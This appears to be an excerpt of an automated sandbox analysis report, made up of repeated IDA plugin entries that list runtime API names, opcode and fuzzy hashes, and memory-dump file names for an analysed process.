                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: isspace$free$CloseEventHandlemallocmemcpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 902297528-0
                                                                                                                                                                            • Opcode ID: afebb808071df177693384e420aa04bb1f73b567d595f9ed8da547e32d591526
                                                                                                                                                                            • Instruction ID: b26dddc61860f517a3ce2c6d469a598acf88c56bd12ee2fbe70fabf8431a0e66
                                                                                                                                                                            • Opcode Fuzzy Hash: afebb808071df177693384e420aa04bb1f73b567d595f9ed8da547e32d591526
                                                                                                                                                                            • Instruction Fuzzy Hash: 60415F26B48B4289FB20EB71D4003ECB3B6AB58B98F944035DE4D67B99DF38D50AC350
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ___lc_codepage_func___lc_locale_name_func__pctype_funcisupper
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3857474680-0
                                                                                                                                                                            • Opcode ID: 697f0993e0c5f1d24f9c767484efc03f421657d87d9f7281fdc3a14322cfee9f
                                                                                                                                                                            • Instruction ID: 9e62cdfdbe5d76e841f586f2fc169b143af40d220132f8d0ddbb5759d9f9c731
                                                                                                                                                                            • Opcode Fuzzy Hash: 697f0993e0c5f1d24f9c767484efc03f421657d87d9f7281fdc3a14322cfee9f
                                                                                                                                                                            • Instruction Fuzzy Hash: F73116E6A0C78282F7118F25D45037E6BD5EB81B82F586035DA9D17795DE3CE4A1CF10
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Name::operator+$Replicator::operator[]
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3863519203-0
                                                                                                                                                                            • Opcode ID: 30a8f2f125bc470f5f47f8832dfa98d673ff8fbdfdee2d9a51f356af74556641
                                                                                                                                                                            • Instruction ID: 01e463fb0e6680f0741ac3d143f1745658dd70d507ef4d409687e6b766dff055
                                                                                                                                                                            • Opcode Fuzzy Hash: 30a8f2f125bc470f5f47f8832dfa98d673ff8fbdfdee2d9a51f356af74556641
                                                                                                                                                                            • Instruction Fuzzy Hash: 084196BAE08B8199EB00CF74D8843AD37A0FB48B88FA59035DA4C67759DF7C9445CB40
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localescodecvtstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3627902316-0
                                                                                                                                                                            • Opcode ID: 9b1c32e4d03cbda99e153f31f72f21e24241e85f2033266064f8f55f5d5db2b3
                                                                                                                                                                            • Instruction ID: cb656b42437f079d9cb4e2eed55e54e9bed6409370c94f4ce6f83f2b3b550f67
                                                                                                                                                                            • Opcode Fuzzy Hash: 9b1c32e4d03cbda99e153f31f72f21e24241e85f2033266064f8f55f5d5db2b3
                                                                                                                                                                            • Instruction Fuzzy Hash: 063173B9A0CB42C2EB14DF35E4500BB6360FB997A0F586232DA9D777E5DE2CE4518B04
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1958836-0
                                                                                                                                                                            • Opcode ID: d5d33d89c34cbe04dcd739ab9c1e0f669668da78f4d51707938014589a4dc942
                                                                                                                                                                            • Instruction ID: 79538d0401b582e37b04d06be6fb0110681926b9aed4a9e2078783355b272fee
                                                                                                                                                                            • Opcode Fuzzy Hash: d5d33d89c34cbe04dcd739ab9c1e0f669668da78f4d51707938014589a4dc942
                                                                                                                                                                            • Instruction Fuzzy Hash: EC3183A9A0CA4282EB15DF35E4500BB6361FF947A0F586232DB6D777E5DE2CE441CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1958836-0
                                                                                                                                                                            • Opcode ID: aee45d2215da4ce7b0f3772c3ce5b61431520466d490ceabc17ed64f9b1dc149
                                                                                                                                                                            • Instruction ID: fb8b8cada77dbcfa27c6b37876a201250ce0a6d426d066f96163e45ac528878d
                                                                                                                                                                            • Opcode Fuzzy Hash: aee45d2215da4ce7b0f3772c3ce5b61431520466d490ceabc17ed64f9b1dc149
                                                                                                                                                                            • Instruction Fuzzy Hash: AC3153EAA0DA0682EB15DF36E5500BB6361FF64BA4F582231DA5D277E5DF2CE441CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesmoneypunctstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3095117837-0
                                                                                                                                                                            • Opcode ID: 38913df2d96a4eec83f92b864a390790dea28e991f3c948397feb914cf3f0946
                                                                                                                                                                            • Instruction ID: 156d057903f1ffb38550a140bc76a40c1a093705059853308e8927619677aa9f
                                                                                                                                                                            • Opcode Fuzzy Hash: 38913df2d96a4eec83f92b864a390790dea28e991f3c948397feb914cf3f0946
                                                                                                                                                                            • Instruction Fuzzy Hash: 233172A9A08A0692EB159F75E4501BB6360FF94BA0F586231EA9D377E5DF3CE4418B00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localescodecvtstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3627902316-0
                                                                                                                                                                            • Opcode ID: 145bbbc3bc158e60b2dcae730ae36a5f341c077dba051ea11f4e148b8dfc7de4
                                                                                                                                                                            • Instruction ID: 5c0e88b2e112312ed61b8910e1e668d7a161de8b94caf1d153f2e79c5757e4a1
                                                                                                                                                                            • Opcode Fuzzy Hash: 145bbbc3bc158e60b2dcae730ae36a5f341c077dba051ea11f4e148b8dfc7de4
                                                                                                                                                                            • Instruction Fuzzy Hash: C73197B9A08A02C2EB15DF35E55007B67A0FB957A0F186231E75D337E5DE2CE4528B00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1958836-0
                                                                                                                                                                            • Opcode ID: d72c8285eb6784160f7c4d4e6db8a24b104de1abd3a77db1aa6ba5dcb5cfb000
                                                                                                                                                                            • Instruction ID: bcba0116ae872b1c855f37009f71b7d43106b86e1b1d0f7b1914eeb2f34baa78
                                                                                                                                                                            • Opcode Fuzzy Hash: d72c8285eb6784160f7c4d4e6db8a24b104de1abd3a77db1aa6ba5dcb5cfb000
                                                                                                                                                                            • Instruction Fuzzy Hash: F13185E9A09B46C1EB189F36D4500BB6361EF947A4F582231EA9D277E5DE2CE4528B00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1958836-0
                                                                                                                                                                            • Opcode ID: b1a0f79d3326f903962460f08adc2b2298a43f582fbf5ad1d06f8bf332c444d0
                                                                                                                                                                            • Instruction ID: e2312d0b441230e0593c5ed00c0e6dcd710360e4450f44733b018e47c33b6c93
                                                                                                                                                                            • Opcode Fuzzy Hash: b1a0f79d3326f903962460f08adc2b2298a43f582fbf5ad1d06f8bf332c444d0
                                                                                                                                                                            • Instruction Fuzzy Hash: 8B3166AEA0CA4282EB15DF35E4500BB6361EB94BA4F586231E79D777E5DE3CE4418F00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1958836-0
                                                                                                                                                                            • Opcode ID: a7b608efc1aee6970888407e30e28b4b43bd13f8e6f74a85ee7bf5bf6733577e
                                                                                                                                                                            • Instruction ID: 58f67cc43d2f845576648fa56fd3c92ca87c79b86392a841b3a6d885db3bff92
                                                                                                                                                                            • Opcode Fuzzy Hash: a7b608efc1aee6970888407e30e28b4b43bd13f8e6f74a85ee7bf5bf6733577e
                                                                                                                                                                            • Instruction Fuzzy Hash: E93157A9A08A0282FB15DF36E45007B6360FFA47A0F586231EA9D777E5DE2CE441CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesmoneypunctstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3095117837-0
                                                                                                                                                                            • Opcode ID: 4ac604afad432e19ffdebc53a4f7af755cceacbe3725a61eabefcaaf70d51ce8
                                                                                                                                                                            • Instruction ID: c1b039badf9992619840200bae001bdc34dcd30c4e35447440c7d30b4aee3c55
                                                                                                                                                                            • Opcode Fuzzy Hash: 4ac604afad432e19ffdebc53a4f7af755cceacbe3725a61eabefcaaf70d51ce8
                                                                                                                                                                            • Instruction Fuzzy Hash: E03196B9A08E4282EB15DF35E4500BB6360FB947A4F586231DB5D777E5DE2CE4418B00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1958836-0
                                                                                                                                                                            • Opcode ID: 0625cce8056e1fbeafd34c4cc32d65403063833f55f3c25b616fc9f327735a8f
                                                                                                                                                                            • Instruction ID: 973b410f6a637a750d6717537b30ad2872494587720b3f269f37bb9e265e33ae
                                                                                                                                                                            • Opcode Fuzzy Hash: 0625cce8056e1fbeafd34c4cc32d65403063833f55f3c25b616fc9f327735a8f
                                                                                                                                                                            • Instruction Fuzzy Hash: 6F3180AAA08A0282EB14DF35E4500BB6360EB94BA0F186231DA5D377E6DE3CF4418B44
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesnumpunctstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 448217422-0
                                                                                                                                                                            • Opcode ID: 3c1d6b78a54c44f3109820ffb5f30ff00c321022ebf7eabf3ec7dc4569d6136e
                                                                                                                                                                            • Instruction ID: 1443fd4e58cf8af75aaf543b56f51da25b518cbcc6c85571c7bc1533eb77b80e
                                                                                                                                                                            • Opcode Fuzzy Hash: 3c1d6b78a54c44f3109820ffb5f30ff00c321022ebf7eabf3ec7dc4569d6136e
                                                                                                                                                                            • Instruction Fuzzy Hash: 103195A9A08B0282EB159F75E4500BB6360FB947A0F186231D79D777E5DF2CE4428B00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesmoneypunctstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3095117837-0
                                                                                                                                                                            • Opcode ID: 969cec1644bb856d1eac6f1a35742c42c096f944a53fd65e4cc6a2f1d40e8599
                                                                                                                                                                            • Instruction ID: 87f2c690ed85398ff541bf8d81aaead0885e1ea1fc53a9d50a23bf2fcb8f546e
                                                                                                                                                                            • Opcode Fuzzy Hash: 969cec1644bb856d1eac6f1a35742c42c096f944a53fd65e4cc6a2f1d40e8599
